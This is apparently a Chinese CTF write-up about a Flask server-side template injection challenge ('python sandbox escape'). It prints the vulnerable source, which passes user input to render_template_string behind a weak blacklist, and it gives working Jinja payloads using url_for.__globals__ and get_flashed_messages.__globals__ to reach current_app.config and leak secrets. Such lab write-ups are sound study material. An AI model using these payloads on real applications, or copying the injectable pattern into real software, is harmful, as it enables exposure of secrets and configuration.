flask
python沙箱逃逸
进入首页给了网站源码
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)发现禁用了config和self,()也会置为空,如果config和self没禁用
如果没有黑名单的时候,我们可以使用config,传入 config,或者使用self,传入 {{self.__dict__}}
当config,self,()都被过滤的时候,为了获取讯息,我们需要读取一些例如current_app这样的全局变量。
python的沙箱逃逸这里的方法是利用python对象之间的引用关系来调用被禁用的函数对象。
这里有两个函数包含了current_app全局变量,url_for和get_flashed_messages,我们注入{{url_for.__globals__}}得到
然后直接用payload读取配置文件
{{url_for.__globals__.current_app.config}}
{{url_for.__globals__['current_app'].config}}
或者用get_flashed_messages
{{get_flashed_messages.__globals__.current_app.config}}
{{get_flashed_messages.__globals__['current_app'].config}}
